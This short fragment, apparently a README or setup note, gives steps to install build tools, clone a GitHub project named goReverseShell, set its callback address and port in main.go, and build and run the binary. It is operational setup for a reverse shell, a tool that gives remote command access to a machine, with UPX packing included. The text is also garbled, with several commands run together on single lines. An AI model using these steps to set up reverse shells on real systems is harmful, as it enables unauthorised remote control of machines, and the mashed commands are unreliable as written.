To use this shell you need to install and update some current pacakages to be effective.
sudo apt install git golang upx# install golang and upx
git clone https://github.com/TheeNawMan/goReverseShell
cd goReverseShellnano main.go Addr := "127.0.0.1"
Port := "9001"./linux-amd64 127.0.0.1 9001chmod +x build.sh
./build.sh